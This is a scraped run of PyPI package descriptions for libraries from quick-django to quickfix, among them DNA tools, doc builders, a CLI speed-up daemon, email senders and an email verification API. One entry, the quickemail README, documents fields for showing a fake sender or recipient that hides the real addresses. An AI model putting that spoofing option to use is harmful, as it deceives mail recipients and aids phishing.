setting.pyINSTALLED_APPS=[....'myproject_app','rest_framework']Check Our Site :https://mefiz.compypi site :https://pypi.org/project/quick-django/"} +{"package": "quickdna", "pacakge-description": "quickdnaQuickdna is a simple, fast library for working with DNA sequences. It is up to 100x faster than Biopython for some\ntranslation tasks, in part because it uses a native Rust module (via PyO3) for the translation. However, it exposes\nan easy-to-use, type-annotated API that should still feel familiar for Biopython users.\u26a0Quickdna is \"pre-1.0\" software. Its API is still evolving. For now, if you're interested in using quickdna, we suggest you depend on anexact versionorgitrev, so that new releases don't break your code.# These are the two main library types. Unlike Biopython, DnaSequence and# ProteinSequence are distinct, though they share a common BaseSequence base class>>>fromquickdnaimportDnaSequence,ProteinSequence# Sequences can be constructed from strs or bytes, and are stored internally as# ascii-encoded bytes.>>>d=DnaSequence(\"taatcaagactattcaaccaa\")# Sequences can be sliced just like regular strings, and return new sequence instances.>>>d[3:9]DnaSequence(seq='tcaaga')# many other Python operations are supported on sequences as well: len, iter,# ==, hash, concatenation with +, * a constant, etc. These operations are typed# when appropriate and will not allow you to concatenate a ProteinSequence to a# DnaSequence, for example# DNA sequences can be easily translated to protein sequences with `translate()`.# If no table=... argument is given, NBCI table 1 will be used by default...>>>d.translate()ProteinSequence(seq='*SRLFNQ')# ...but any of the NCBI tables can be specified. A ValueError will be thrown# for an invalid table.>>>d.translate(table=22)ProteinSequence(seq='**RLFNQ')# This exists too! It's somewhat faster than Biopython, but not as dramatically as# `translate()`>>>d[3:9].reverse_complement()DnaSequence(seq='TCTTGA')# This method will return a list of all (up to 6) possible translated reading frames:# (seq[:], seq[1:], seq[2:], seq.reverse_complement()[:], ...)>>>d.translate_all_frames()(ProteinSequence(seq='*SRLFNQ'),ProteinSequence(seq='NQDYST'),ProteinSequence(seq='IKTIQP'),ProteinSequence(seq='LVE*S*L'),ProteinSequence(seq='WLNSLD'),ProteinSequence(seq='G*IVLI'))# translate_all_frames will return less than 6 frames for sequences of len < 5>>>len(DnaSequence(\"AAAA\").translate_all_frames())4>>>len(DnaSequence(\"AA\").translate_all_frames())0# There is a similar method, `translate_self_frames`, that only returns the# (up to 3) translated frames for this direction, without the reverse complement# The IUPAC ambiguity codes are supported as well.# Codons with N will translate to a specific amino acid if it is unambiguous,# such as GGN -> G, or the ambiguous amino acid code 'X' if there are multiple# possible translations.>>>DnaSequence(\"GGNATN\").translate()ProteinSequence(seq='GX')# The fine-grained ambiguity codes like \"R = A or G\" are accepted too, and# translation results are the same as Biopython. In the output, amino acid# ambiguity code 'B' means \"either asparagine or aspartic acid\" (N or D).>>>DnaSequence(\"RAT\").translate()ProteinSequence(seq='B')# To disallow ambiguity codes in translation, try: `.translate(strict=True)`BenchmarksFor regular DNA translation tasks, quickdna is faster than Biopython. (Seebenchmarks/bench.pyfor source).\nMachines and workloads vary, however -- always benchmark!tasktimecomparisontranslate_quickdna(small_genome)0.00306ms / itertranslate_biopython(small_genome)0.05834ms / iter1908.90%translate_quickdna(covid_genome)0.02959ms / itertranslate_biopython(covid_genome)3.54413ms / iter11979.10%reverse_complement_quickdna(small_genome)0.00238ms / iterreverse_complement_biopython(small_genome)0.00398ms / iter167.24%reverse_complement_quickdna(covid_genome)0.02409ms / iterreverse_complement_biopython(covid_genome)0.02928ms / iter121.55%Should you use quickdna?Quickdna prosIt's quick!It's simple and small.It has type annotations, including apy.typedmarker file for checkers like MyPy or VSCode's PyRight.It makes a type distinction between DNA and protein sequences, preventing confusion.Quickdna cons:It's newer and less battle-tested than Biopython.It's not yet 1.0 -- the API is liable to change in the future.It doesn't support reading FASTA files or many of the other tasks Biopython can do,\nso you'll probably end up still using Biopython or something else to do those tasks.InstallationQuickdna has prebuilt wheels for Linux (manylinux2010), OSX, and Windows availableon PyPi.DevelopmentQuickdna usesPyO3andmaturinto build and upload the wheels, andpoetryfor handling dependencies. This is handled via\naJustfile, which requiresJust, a command-runner similar tomake.PoetryYou can install poetry fromhttps://python-poetry.org, and it will handle the other python dependencies.JustYou can installJustwithcargo install just, and then run it in the project directory to get a list of commands.FlamegraphsThejust profilecommand requirescargo-flamegraph, please see that repository for installation instructions."} +{"package": "quickdoc", "pacakge-description": "UNKNOWN"} +{"package": "quickdocs", "pacakge-description": "QuickdocsCreates HTML docs from a project's readme and sphinx-apidoc.StatusSourceShieldsProjectHealthRepositoryPublishersActivityInstallationpipinstallquickdocsUsageTo create an up to date sphinx configuration:quickdocs.quickdocs.ymlNow we can build the documentation:sphinx-build-EdocsbuildThis will run copy and markup the project's readme at runtime so that you don't need to recompile the sphinx configuration unless any of the settings change.Required settings file fields:project: Quickdocs\nversion: 1.2.1\nauthor: Joel Lefkowitz\nhtml_title: Quickdocs\ngithub_url: JoelLefkowitz/quickdocsOptional settings:debug: # Default: False\nproject_root: # Default: os.getcwd()\nverbose_name: # Default: Nonemarkup_readme: # Default: True\nreadme_path: # Default: \"README.md\"apidoc_module_dir: # Default: NoneIntegrating with readthedocs.readthedocs.yml:version: 2\n\nsphinx:\n configuration: docs/conf.py\n\nformats: all\n\npython:\n version: 3.8\n install:\n - requirements: docs/requirements.txtRemoving old documentationThe sphinx-apidoc plugin generates documentation under docs/api. When running, the sphinx plugin will overwrite but not delete out of date files in this directory. This means if you rename a module you must delete the out of date documentation. This package should not delete the docs/api directory because some developers will add custom documentation to this directory as they write new modules.TestsTo run unit tests and generate a coverage report:grunttests:unitDocumentationThis repository's documentation is hosted onreadthedocs.To generate the sphinx configuration:gruntdocs:generateThen build the documentation:gruntdocs:buildToolingTo run linters:gruntlintTo run formatters:gruntformatBefore committing new code:gruntprecommitThis will run linters, formatters, tests, generate a test coverage report and the sphinx configuration.Continuous integrationThis repository uses Travis CI to build and test each commit. Formatting tasks and writing documentation must be done before committing new code.VersioningThis repository adheres to semantic versioning standards.\nFor more information on semantic versioning visitSemVer.Bump2version is used to version and tag changes.\nFor example:bump2versionpatchChangelogPlease read this repository'sCHANGELOGfor details on changes that have been made.ContributingPlease read this repository's guidelines onCONTRIBUTINGfor details on our code of conduct and the process for submitting pull requests.ContributorsJoel Lefkowitz-Initial work-Joel LefkowitzRemarksLots of love to the open source community!"} +{"package": "quickdone", "pacakge-description": "Get Things Done Quickly!Usage$pipinstallquickdone>>>importquickdoneasqdfp() short for format_path(file_path)>>>qd.fp(r'C:\\Users\\user_name\\Desktop\\test.xlsx')'C:/Users/user_name/Desktop/test.xlsx'etc() short for excel_to_csv(input_path,output_path,input_enc,output_enc)>>>qd.etc(r'C:\\Users\\user_name\\Desktop\\test.xlsx',r'C:\\Users\\user_name\\Desktop\\test.csv')Packaging$pythonsetup.pysdistbdist_wheel\n$twineuploaddist/*For more, seepython packaging-projectsorPackaging and distributing projects"} +{"package": "quickdraw", "pacakge-description": "quickdrawGoogle Quick, Draw!is a game which is\ntraining a neural network to recognise doodles.quickdrawis an API for using the Google Quick, Draw! dataquickdraw.withgoogle.com/data,\ndownloading the data files as and when needed, caching them locally and\nallowing them to be used.Getting startedWindowspipinstallquickdrawmacOSpip3installquickdrawLinux / Raspberry Pisudopip3installquickdrawUseOpen the Quick Draw data, pull back ananvildrawing and save it.fromquickdrawimportQuickDrawDataqd=QuickDrawData()anvil=qd.get_drawing(\"anvil\")anvil.image.save(\"my_anvil.gif\")Documentationquickdraw.readthedocs.io"} +{"package": "quickdrop", "pacakge-description": "QuickDropThis is a simple CLI for quickly sharing a file or folder via Dropbox\nthat's already located in a Dropbox folder.It's as simple as$ export DROPBOX_ACCESS_TOKEN=yourdropboxaccesstoken\n$ export DROPBOX_ROOT_PATH=yourdropboxrootpath\n$ pip install quickdrop\n\nCollecting quickdrop\n...\nSuccessfully installed quickdrop-x.y.z\n\n$ url \n\nOkay, is now shared, accessible via\nhttps://www.dropbox.com/sh/bunchofrandomchars/morerandomcharsnstuff?dl=0."} +{"package": "quickdsa", "pacakge-description": "No description available on PyPI."} +{"package": "quickdump", "pacakge-description": "quickdumpQuickly store arbitrary Python objects in local files.Library status - this is an experimental work in progress that hasn't been\nbattle-tested at all. The API will change often between versions, and you may\nlose all your data due to silly bugs.FeaturesStore arbitrary objects locallyNo config or boilerplate requiredDump to TCP serverDump to HTTP serverNotes(todo - rewrite this in a coherent manner)Currently, compression is applied per call todump. This isn't very\nefficient (probably?)Labels are slugified to prevent errors from invalid characters in the filenameQuickly dump (almost) any object you like:fromquickdumpimportqd,QuickDumperfromdecimalimportDecimalforiinrange(10):result=Decimal(i)**Decimal(\"0.5\")qd(result)And use them whenever it's convenient later:forobjinqd.iter_dumps():print(obj)# 0# 1.000000000000000000000000000# 1.414213562373095048801688724# ...Dump objects assigning a label, or create a dumper with a pre-configured label:qd(\"Arma\u00e7\u00e3o\",\"Campeche\",\"Solid\u00e3o\",label=\"beaches\")beach_dumper=QuickDumper(\"beaches\")beach_dumper(\"Morro das Pedras\",\"A\u00e7ores\",\"Gravat\u00e1\")Iterate over multiple labels (including the default):forobjinqd.iter_dumps(\"beaches\",\"default_dump\"):print(obj)Iterate only over objects that match some filter:deffilter_initial_a(obj):returnnotobj.startswith(\"A\")forobjinqd.iter_dumps(\"beaches\",filter_fun=filter_initial_a):print(obj)# Campeche# ...Someday\u2122Enable simple serialization of unpicklable types (e.g. save asockettype property of some object assocket's string representation instead of\njust ignoring the object)Quickdump by piping from shellFunction decorator able to log function inputs and/or outputsReal time visualization of dumped data and metadata"} +{"package": "quickEDA", "pacakge-description": "This is a very simple python package to do all EDA activities for any file.How to use:pip install quickEDA\n\nimport quickEDA \n\nfrom quickEDA import eda\n\neda(\"give your file path here\")Just pass the path of your file and get the exploratory data analysis done\nin few seconds.Provides statistical information like count of values, Mean, Standard deviation, Minimun value, maximum value, 25%, 50% & 75% percentile of all the numerical columnsProvides overview of the file like number of columns present, data type of each column, null values present and memory space occupied by this datasetSample of first 5 rowsSample of last 5rowsCorrelation value between each columnNo. of rows and columns presentMissing values in data & missing values percentageIf duplicate rows present & dupliacte values percentageScatter matrix - to visualize the spread of dataBox plot to identify outliersColumn wise detailsDistinct valuesMissing valuesIf zeroes presentIQRlower outliers and percentage in each columnupper outliers and percentage in each columnVisualize distribution or each columnRelationship between each x column with Y columnThings to Note:*Please place your 'Y' column or dependant feature as last column\n*If facing issue with path , try giving \"c:\\\\Users\\\\...... (double slash)\""} +{"package": "quickemail", "pacakge-description": "QuickEmail\u9879\u76ee\u4ecb\u7ecd\u7b80\u6613\u7684\u90ae\u4ef6\u53d1\u4fe1\u5de5\u5177\u3002\u652f\u6301\u8ba4\u8bc1/\u4e0d\u8ba4\u8bc1\u53d1\u4fe1\u3002\n \u4f7f\u7528UTF-8\u7f16\u7801\u3002\u53ef\u4ee5\u4e00\u6b21\u8fde\u63a5\u58f0\u660e\u591a\u6536\u4ef6\u4eba\u3001\u6284\u9001\u4eba\u4f7f\u7528\u8bf4\u660e\u7b80\u6613\u7684\u90ae\u4ef6\u53d1\u4fe1\u5de5\u5177\u3002\u652f\u6301\u8ba4\u8bc1/\u4e0d\u8ba4\u8bc1\u53d1\u4fe1\u3002\n \u4f7f\u7528UTF-8\u7f16\u7801\u3002\n from quickemail import QuickEmail\u53d1\u4fe1\u524d\u5148\u5b9a\u4e49\u53d1\u4fe1\u8981\u7d20\uff1a\u6307\u5b9a\u4e3b\u673a\u548c\u7aef\u53e3\uff0c\u5fc5\u987b\u53c2\u6570\uff1a\n quicksend = QuickEmail('mail.test.com', 25) # SMTP\u53d1\u4fe1\u7aef\u53e3\uff0c\u9ed8\u8ba4\u662f25 SSL\u94fe\u63a5\u4f7f\u7528465\n quicksend.debug = True # \u6253\u5f00\u8c03\u8bd5\n \u5b9a\u4e49HELO\u4e3b\u673a\u540d\uff0c\u53c2\u6570\u53ef\u7701\u7565\uff1a\n quicksend.helo = 'QuickEmail' # HELO\u4e3b\u673a\u540d\u4e0d\u80fd\u4f7f\u7528\u6709\u7a7a\u683c\u7684\u5b57\u7b26\u4e32\uff0c\u53ef\u4ee5\u7701\u7565\n quicksend.tls = True / quicksend.ssl = True # \u5f00\u542fstartTLS\u6216\u8005SSL\uff0cSSL\u7aef\u53e3\u4e00\u822c\u4e3a465\n \u8ba4\u8bc1\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0cauthsend()\u5fc5\u987b\u7684\u53c2\u6570\uff1a\n quicksend.mail_user = 'a' # \u8ba4\u8bc1\u7528\u6237\u540d\n quicksend.user_pass = 'test' # \u8ba4\u8bc1\u7528\u6237\u7684\u5bc6\u7801\n\n \u53d1\u4fe1\u4eba\u3001\u6536\u4fe1\u4eba\u4e3a\u5fc5\u987b\u53c2\u6570\uff1a\n quicksend.mail_from = 'AA\u9ad8A' # \u53d1\u4fe1\u4eba\u5730\u5740\uff0c\u683c\u5f0f\u4e3a: FullName\n quicksend.mail_to = '\u4e00\u4e8c\u4e09<123@test.com>,ABC' # \u683c\u5f0f\u540c\u4e0a\uff0c\u591a\u5730\u5740\u4f7f\u7528\u9017\u53f7\",\"\u5206\u9694\n\n \u6284\u9001\u4eba\uff0c\u53ef\u7701\u7565\uff1a\n quicksend.mail_cc = '\u4e00\u4e8c\u4e09<123@test.com>'\n \n \u90ae\u4ef6\u65f6\u95f4\u5b9a\u4e49\uff0c\u53ef\u7701\u7565\uff1a\n quicksend.mail_date = 1691544067\n\n \u90ae\u4ef6\u4e3b\u9898\u3001\u5185\u5bb9\uff0c\u652f\u6301\u4f7f\u7528HTML\uff1a \n quicksend.mail_subject = 'mY subject\u8fd8\u6709\u4e2d\u6587!'\n quicksend.mail_content = 'red content\u4e00\u6bb5\u4e2d\u6587'\n quicksend.is_html = True\n\n \u6dfb\u52a0\u9644\u4ef6\uff0c\u53ef\u7701\u7565\uff1a\n quicksend.mail_attach = ['abc.jpg'] # \u6dfb\u52a0\u9644\u4ef6 \u7c7b\u578b\u4e3alist\n \n \u9ad8\u7ea7\u5b9a\u5236\uff0c\u53ef\u7701\u7565\uff1a\n quicksend.content_from = '\u90ae\u4ef6\u663e\u793a\u7684\u5047\u53d1\u4ef6\u4eba' # \u5b9a\u5236\u90ae\u4ef6\u4fe1\u4f53\u663e\u793a\u7684\u53d1\u4ef6\u4eba\uff0c\u4e00\u822c\u4e3a\u6765\u9690\u85cf\u5b9e\u9645\u7684mail_from\u3002\n quicksend.content_to = '\u90ae\u4ef6\u663e\u793a\u7684\u5047\u6536\u4ef6\u4eba' # \u5b9a\u5236\u90ae\u4ef6\u4fe1\u4f53\u663e\u793a\u7684\u6536\u4ef6\u4eba\uff0c\u4e00\u822c\u4e3a\u6765\u9690\u85cf\u5b9e\u9645\u7684mail_to\u3002\n quicksend.content_cc = '\u90ae\u4ef6\u663e\u793a\u7684\u5047\u6284\u9001\u4eba' # \u5b9a\u5236\u90ae\u4ef6\u4fe1\u4f53\u663e\u793a\u7684\u6284\u9001\u4eba\uff0c\u4e00\u822c\u4e3a\u6765\u9690\u85cf\u5b9e\u9645\u7684mail_cc\u3002\u4f7f\u7528creatmsg()\u5efa\u7acb\u90ae\u4ef6\u4fe1\u4f53\u5185\u5bb9\u3002(\u53ef\u4ee5\u5ffd\u7565)msg = quicksend.creatmsg()\u4f7f\u7528authsend()\u6216\u8005send()\u53d1\u9001\u90ae\u4ef6\uff0ccreatmsg()\u672a\u6267\u884c\uff0c\u53c2\u6570msg\u53ef\u5ffd\u7565\u3002quicksend.authsend(msg)\n quicksend.send()\u9519\u8bef\u663e\u793a(\u6210\u529f\u8fd4\u56deTrue\uff0c\u5931\u8d25\u8fd4\u56deFalse)result = quicksend.authsend(msg)\n if result:\n print(result)\n \n result = quicksend.send(msg)\n if result:\n print(result)"} +{"package": "quick-email", "pacakge-description": "quick-emailQuick-and-Dirty Email SenderEmails are ubiquitous, but not super-straightforward from a programming standpoint. The standards in use (SMTP, MIME) are powerful, but complex if you want to do anything nicer than a simple plain-test email. This library was built and iterated upon for my personal projects, and it might just help you too.Supports both Python>=v2.7and>=3.4.Installationpip install quick-emailUsageSend Emailquick_email.send_email(host, port, send_from, subject[, send_to[, send_cc[, send_bcc[, plain_text[, html_text[, attachment_list[, inline_attachment_dict[, username[, password[, timeout[, require_starttls]]]]]]]]]]])My super-useful utility function. Creates and sends an email in one fell swoop. All parameters are passed to the functions below.Create Messagequick_email.build_msg(send_from, subject[, send_to[, send_cc[, send_bcc[, plain_text[, html_text[, attachment_list[, inline_attachment_dict]]]]]]])Creates aemail.message.Messagefor deferred sending or additional preparing.Email addresses can be a string (either of formexample@example.comorExample Name ), or a tuple, as returned byemail.utils.parseaddr.send_fromis a single email address.subjectis the Subject string of the email.send_to,send_cc, andsend_bccare all either singular email addresses, orlists of email addresses if you have multiple recipients. At least one address must be present among the parameters, otherwise anAssertionErrorwill be raised.plain_textis the plain-text part of the email.html_textis the HTML part of the email. You can include one or both, but if no text is present, anAssertionErrorwill be raised.attachment_listis an optionallistofquick_email.Attachments.inline_attachment_dictis an optionaldictofstr: quick_email.Attachmentform. The key is the CID of your attachment. In many email clients, you can include images inline in the HTML (ie). However, if the image you want to display is an attachment (and not at some URL), it's a little trickier. You must give your attachment a Content-ID (CID), and yourimgtag must look like. This may be preferred to the inline-base64 encoding (ie).class quick_email.Attachment(filename, bytes)filenameis the filename string.bytesis the bytes-like object of the content.Send Messagequick_email.send_msg(msg, host, port[, username[, password[, timeout[, require_starttls]]]])Sends aemail.message.Messageto its recipients.msgis theemail.message.Message, which you may have built usingquick_email.build_msg, or handcrafted youself.hostis the host string to connect to. Usually aFQDN, or an IP address.portis the port number to connect to. Usually25for un-encrypted email.usernameis the username of a username/password combo used to authenticate. Leave it off if your service is unauthenticated.passwordis the password of a username/password combo used to authenticate. Leave it off if your service is unauthenticated.timeoutis the timeout interval (in seconds). If not specified, the global default timeout setting will be used.require_starttlsis a flag whether to request the message sending be encrypted. Defaults toFalse, but turn it on if you can."} +{"package": "quickemailverification", "pacakge-description": "Official Email Validation API library client for PythonQuickEmailVerification provides the quickest way to avoid fake / invalid\nemails.Get actual users by scanning email address.Remove invalid, dead and fake emails from your email list.Save time and money by sending mail to actual users.Let\u2019s Get StartedTo begin, signUp atquickemailverification.comand\ncreate a FREE account. After signup logged in, click onAPI\nSettingsand then\nclickAdd API Key. To use API you need 2 parameters.email - (string) This is a email address you need to verify. It should\nbe url encoded.apikey - (string) This is the key you generated from\n\u201capi settings\u201d page.NOTE: Keep API key with you. You\u2019ll need it to setup the client as explained below.InstallationMake sure you havepipinstalled.$pipinstallquickemailverificationVersionsWorks with [ 2.6 / 2.7 / 3.2 / 3.3 / 3.4 ]Usageimportquickemailverificationclient=quickemailverification.Client('Your_API_Key_Here')quickemailverification=client.quickemailverification()# PRODUCTION MODEresponse=quickemailverification.verify('test@example.com')# SANDBOX MODE# response = quickemailverification.sandbox('valid@example.com')print(response.body)# The response is in the body attributeResponse informationA successful API call responds with the following values:resultstring- The verified results will be:valid,invalid,unknownreasonstring- Reason definitions are as below:invalid_email- Specified email has invalid email address syntaxinvalid_domain- Domain name does not existrejected_email- SMTP server rejected email. Email does not existaccepted_email- SMTP server accepted email addressno_connect- SMTP server connection failuretimeout- Session time out occurred at SMTP serverunavailable_smtp- SMTP server is not available to process\nrequestunexpected_error- An unexpected error has occurredno_mx_record- Could not get MX records for domaintemporarily_blocked- Email is temporarily greylistedexceeded_storage- SMTP server rejected email. Exceeded storage\nallocationdisposabletrue | false-trueif the email address uses adisposabledomainaccept_alltrue | false-trueif the domain appears toaccept allemails delivered to that domainroletrue | false-trueif the email address is aroleaddress (manager@example.com,ceo@example.com, etc)freetrue | false-trueif the email address is from free\nemail provider like Gmail, Yahoo!, Hotmail etc.emailstring- Returns a normalized version.\n(Niki@example.com->niki@example.com)userstring- The local part of an email address.\n(niki@example.com->niki)domainstring- The domain of the provided email address.\n(niki@example.com->example.com)mx_recordstring- The preferred MX record of email domain. This\nfield contains empty string when MX record is not available.mx_domainstring- The domain name of the MX host. This field\ncontains empty string when MX record is not available.safe_to_sendtrue | false-trueif the email address is\nsafe for deliverabilitydid_you_meanstring- Returns email suggestions if specific\ntypo errors found in emailsuccesstrue | false-trueif the API request was\nsuccessfulmessagestring- Describes API call failure reasonHTTP Response headersTotal remaining credits can be found by http response header. It\ncontains overall remaining credits, including Persistent & Per day\ncredits.X-QEV-Remaining-Credits- Your remaining email verification\ncredits (i.e. Per Day Credits + Persistent Credits).HTTP status codes for QuickEmailVerification API callsQuickEmailVerification API also returns following HTTP status codes to\nindicate success or failure of request.200- Request is completed successfully.400- Server can not understand the request sent to it. This is\nkind of response can occur if parameters are passed wrongly.401- Server can not verify your authentication to use api.\nPlease check whether API key is proper or not.402- You are running out of your credit limit.404- Requested API can not be found on server.429- Too many requests. Rate limit exceeded.Sandbox ModeQuickEmailVerification single email verification API sandbox mode helps developers to test their integration against simulated results. Requesting against sandbox endpoint is totally free and no credits will be deducted from actual credit quota.Please refer ourknowledge baseto learn more about sandbox mode.LicenseMITBug ReportsReporthere.Need Help? Feel free to contact ushttps://quickemailverification.com/contact-us"} +{"package": "quickemcee", "pacakge-description": "quickemceeA Python library to quickly set up MCMC scripts based on theemceepackage. Includes functions and classes to quickly set upemceeobjects, run MCMC, and analyze the results with minumum effort from the end user.Github pagesVisit quickemcee's Github pages onhttps://sofia-scz.github.io/quickemcee/. There you can find documentation, worked examples, and other information.Installationpip install quickemceeReferencing this workRecommended BibTex citation@software{quickemcee,\n author = {Scozziero, Sofia Anna},\n title = {quickemcee: simple prebuilt MCMC scripts},\n month = jul,\n year = 2022,\n publisher = {Zenodo},\n doi = {10.5281/zenodo.6857842},\n url = {https://doi.org/10.5281/zenodo.6857842}\n}"} +{"package": "quicken", "pacakge-description": "quickenMake Python tools fast.# app/cli.pyimportslow_moduleimporthas_lots_of_dependenciesdefcli():print('hello world')# Finally get to work after everything is loaded.slow_module.do_work(has_lots_of_dependencies)# app/main.pyfromquickenimportcli_factory@cli_factory('app')defmain():from.cliimportclireturncliThat's it! The first timemain()is invoked a server will be created and\nstay up even after the process finishes. When another process starts up it\nwill request the server to executecliinstead of reloading all modules\n(and dependencies) from disk. This relies on the speed offorkbeing lower\nthan the startup time of a typical cli application.Ifpython -c ''takes 10ms, this module takes around 40ms. That's how\nfast your command-line apps can start every time after the server is up.WhyPython command-line tools are slow. We can reduce dependencies, do lazy\nimporting, and do little/no work at the module level but these can only go\nso far.Our goal is to speed up the cli without giving up any dependencies. Every Python\nCLI tool should be able to get to work in less than 100ms.GoalsBe as fast as possible when invoked as a client, be pretty fast when invoked\nand we need to start a server.LimitationsUnix only.Debugging may be less obvious for end users or contributors.Daemon will not automatically have updated gid list if user was modified.Access to the socket file implies access to the daemon (and the associated command that it would run if asked).TipsProfile import time with -X importtime, see if your startup is actually the\nproblem. If it's not then this package will not help you.Distribute your package as a wheel. When wheels are installed they create\nscripts that do not importpkg_resources, which can save 60ms+ depending\non disk speed and caching.Developmentln -sf ../.githooks .git/hooks"} +{"package": "quick-encrypt", "pacakge-description": ""} +{"package": "quicker", "pacakge-description": "quickerInstallationpipinstallquicker"} +{"package": "quickerDebug", "pacakge-description": "Welcome to quickerDebug!QuickerDebug offers a standardized alternative toprint(\"here\")andprint(my_var)with simple, quick, and efficient logging functions that provide information without the need to repeat yourself. Generally, the best use case is for small scale applications or test code, where a complete debugger is overkill, butprint(\"here\")can get overly tedious to repeatedly type. Function names are purposefully shortened avoid writing out long function calls, so you don't waste time while debugging.Note that quickerDebug is optimized for terminals supported colors (throughtermcolor), meaning it may not work on all CLIs.Installation>> pip install quickerDebugQuick StartInitializationTo use the package, you need to create an instance ofQuickerDebug, from which methods can be called.fromquickerDebugimportquickerDebugqd=quickerDebug.QuickerDebug()Basic LoggingThe two essential functions for logging areqd.p()andqd.v().# Logs index, line number, timestamp, and a optional messageqd.p()# qd.p() also supports positional arguments for extra functionality like so:qd.p(status=\"DEBUG\",msg=\"\",color=None,showFullPath=False,**kwargs)# ieqd.p(\"INFO\",\"First Test\",\"blue\",True)# Logs all variables with thier current valuesqd.v()# Variables are displayed inlineqd.v(inline=True)AutoVar ConfigsAutoVar configs allow you to set up a list of varibles with a certain format to be printed with current values with theqd.vc()function, and then allows you to access that printing configuration withqd.v(config_key).a=1b=2# Create a config that prints the variables a and b, where the config_key is 1qd.vc(1,\"a\",\"b\")# Would print just a & bqd.v(1)# config_key is the first argumentVariable TrackingquickerDebugalso provides lightweight, real-time variable tracking in the terminal throughqd.track()andqd.rt()a=1# Would print the value of a every 10ms for 5sqd.track(\"a\",10,5)# Would clear the terminal after each printqd.track(\"a\",10,5,autoclear=True)# Preset Function for indefinite real-time trackingqd.rt(\"a\")Additional Keyword ArgumentsAll quickerDebug functions can take certain keyword arguments, as shown below:FunctionKwargsqd.p()status : strqd.p() & qd.v()showFullPath : boolqd.p() & qd.v()color : str (from colors in termcolor)qd.p()msg : strqd.v()inline : boolqd.track() & qd.rt()autoclear : boolKwargPossible Valuesstatus\"OFF\", \"O\", \"ERROR\", \"ERR\", \"E\", \"WARNING\", \"WARN\", \"W\", \"DEBUG\", \"D\", \"INFO\", \"I\", \"TRACE\", \"T\"color\"grey\", \"red\", \"green\", \"yellow\", \"blue\", \"magenta\", \"cyan\", \"white\""} +{"package": "quickerml", "pacakge-description": "quickermlMachine learning module intended to be your first shot swiss knife.If you work on Data Science or Artificial Intelligence projects you probably have had to repeat over and over again the same crucial first steps on your project in order to find what's the best model option for your data.There is the idea that gave birth toquickerml: Automatize those repetitive initial tests to find the best starting model for your project.Installationpip install quickermlGet startedfrom quickerml import Finder\n\nfinder = Finder(\n problem_type='regression', \n models=[\n LinearSVR(), \n RandomForestRegressor(), \n XGBRegressor(), \n LGBMRegressor()\n ]\n)\n\nbest = finder.find(X, y)"} +{"package": "quickest", "pacakge-description": "Install$ pip install quickestQuickstartGet a config file:$ quickest getconfRun a simulation and save the result locally:$ quickest simulate --conf [CONFIG].jsonView a result from a folder:$ quickest view --loc [FOLDER]See more options:$ quickest -h"} +{"package": "quickey-python-sdk", "pacakge-description": "QuickeySDK - PythonA Login Management System for ApplicationHow to Usefrom quickey_python_sdk import QuickeySDK\n\nsdk = QuickeySDK('YOUR API KEY')Get App Metadatadata = sdk.app.getAppMetaData()\nappId = data.json()['app']['_id']Send SMS OTPinput = {'phone':'YOUR PHONE NUMBER', 'provider':'YOUR PROVIDER'}\ncustomerData = sdk.app.sendSMSOTP(**input)Get Access Token By Emailinput = {'email':'YOUR USER EMAIL', 'provider':'YOUR PROVIDER'}\ntoken = sdk.auth.getAccessTokenByEmail(**input)Get Access Token By Phoneinput = {'phone':'YOUR PHONE NUMBER', 'provider':'YOUR PROVIDER', 'otpCode':'YOUR OTP CODE'}\ntoken = sdk.auth.getAccessTokenByPhone(**input)Link Phone To Emailinput = {'phone':'YOUR PHONE NUMBER', 'token':'YOUR ACCESS TOKEN LOGIN FROM EMAIL'}\ncustomerdata = sdk.auth.linkPhoneToEmail(**input)"} +{"package": "quickf", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickfiles", "pacakge-description": "UNKNOWN"} +{"package": "quickfind", "pacakge-description": "UNKNOWN"} +{"package": "quickfire", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix", "pacakge-description": "Copyright (c) 2001-2018 Oren MillerRedistribution and use in source and binary forms, with or withoutmodification, are permitted provided that the following conditionsare met:1. Redistributions of source code must retain the above copyrightnotice, this list of conditions and the following disclaimer.2. Redistributions in binary form must reproduce the above copyrightnotice, this list of conditions and the following disclaimer inthe documentation and/or other materials provided with thedistribution.3. The end-user documentation included with the redistribution,if any, must include the following acknowledgment:\"This product includes software developed byquickfixengine.org (http://www.quickfixengine.org/).\"Alternately, this acknowledgment may appear in the software itself,if and wherever such third-party acknowledgments normally appear.4. The names \"QuickFIX\" and \"quickfixengine.org\" mustnot be used to endorse or promote products derived from thissoftware without prior written permission. For writtenpermission, please contact ask@quickfixengine.org5. Products derived from this software may not be called \"QuickFIX\",nor may \"QuickFIX\" appear in their name, without prior writtenpermission of quickfixengine.orgTHIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIEDWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIESOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE AREDISCLAIMED. IN NO EVENT SHALL QUICKFIXENGINE.ORG ORITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOTLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OFUSE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED ANDON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUTOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OFSUCH DAMAGE.Download-URL: http://www.quickfixengine.orgDescription: UNKNOWNPlatform: UNKNOWN"} +{"package": "quickfix2", "pacakge-description": "Quickfix2descriptionThis Python package is the same as the original QuickFIX package,except that it is compiled binaries for Linux and macOS.source code:https://github.com/tangjicheng46/quickfix2original source code:https://github.com/quickfix/quickfixbuildpip install -U setuptools wheel twine\n\npython setup.py bdist_wheel --plat-name=manylinux1_x86_64"} +{"package": "quickfix-albert", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-arm", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickfix-arm64", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-binary", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-ch", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-M1", 